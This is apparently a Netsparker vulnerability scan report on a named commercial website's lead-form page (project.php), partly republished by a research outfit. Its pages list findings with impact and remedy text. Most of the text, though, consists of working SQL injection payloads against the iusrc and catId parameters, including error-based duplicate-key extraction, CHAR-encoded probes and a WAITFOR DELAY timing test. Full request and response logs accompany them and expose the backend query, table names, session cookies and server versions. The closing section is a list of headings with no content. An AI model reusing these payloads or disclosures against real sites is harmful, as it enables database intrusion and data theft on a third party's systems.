prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5

- /ppc/leadflow/hins00/leadflow/hins00/project.php

/ppc/leadflow/hins00/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='%2B%20(se..

Parameters

Parameter	Type	Value
catId	GET	50002
iusrc	GET	'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=tl20kuubb8ljtr3o3ev30h8vq4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:54:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 3486
Connection: close
Content-Type: text/html; charset=UTF-8

select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5

[Possible] Second Order SQL Injection

1 TOTAL

CRITICAL

Second Order SQL Injection occurs when data input stored in a place and then used in a different SQL Query without correct filtering or without using parameterised queries. Even though Netsparker believes that there is a Second Order SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

See the remedy for solution.
If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

Required Skills for Successful Exploitation

External References

Remedy References

MSDN - Protect From SQL Injection in ASP.NET

- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%..

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=tl20kuubb8ljtr3o3ev30h8vq4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:45:33 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 3901
Connection: close
Content-Type: text/html; charset=UTF-8

select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:0' for key 1

Cookie Not Marked As HttpOnly

1 TOTAL

LOW

CONFIRMED

Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

See the remedy for solution
Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /ppc/leadflow/hins00/

/ppc/leadflow/hins00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/

Identified Cookie

PHPSESSID

Request

GET /ppc/leadflow/hins00/ HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:23:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=tl20kuubb8ljtr3o3ev30h8vq4; path=/
Content-Length: 95
Connection: close
Content-Type: text/html; charset=UTF-8

<h1>Not Found</h1><p>The requested URL /ppc/leadflow/hins00/ was not found on this server.</p>

Apache Version Disclosure

1 TOTAL

LOW

Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%..

Extracted Version

Apache/2.2.9 (Fedora)

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:23:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pma4cor0ajp0ltf2ku0ntvkhn0; path=/
Content-Length: 3901
Connection: close
Content-Type: text/html; charset=UTF-8

select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1

PHP Version Disclosure

1 TOTAL

LOW

Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%..

Extracted Version

PHP/5.2.6

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

Database Error Message

1 TOTAL

LOW

Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.

- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&i..

Parameters

Parameter	Type	Value
catId	GET	';WAITFOR DELAY '0:0:25'--
iusrc	GET	'+(select 1 and row(1,1)>(select count(),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /ppc/leadflow/hins00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=tl20kuubb8ljtr3o3ev30h8vq4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:23:53 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4254
Connection: close
Content-Type: text/html; charset=UTF-8

select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat' at line 5

MySQL Database Identified

1 TOTAL

INFORMATION

CONFIRMED

Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.

- /ppc/leadflow/hins00/leadflow/hins00/project.php

/ppc/leadflow/hins00/leadflow/hins00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php?catId='%2B(select+1+and+row(..

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection

Total Requests

Average Speed

GHDB, DORK Tests

VULNERABILITIES

Boolean Based SQL Injection

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

External References

Remedy References

/ppc/leadflow/hins00/leadflow/hins00/project.php CONFIRMED

Parameters

Request

Response

/ppc/leadflow/hins00/leadflow/hins00/project.php CONFIRMED

Parameters

Request

Response

SQL Injection

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

External References

Remedy References

/ppc/leadflow/hins00/leadflow/hins00/project.php CONFIRMED

Parameters

Request

Response

/ppc/leadflow/hins00/leadflow/hins00/project.php CONFIRMED

Parameters

Request

Response

[High Possibility] SQL Injection

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

External References

Remedy References

/ppc/leadflow/hins00/project.php

Parameters

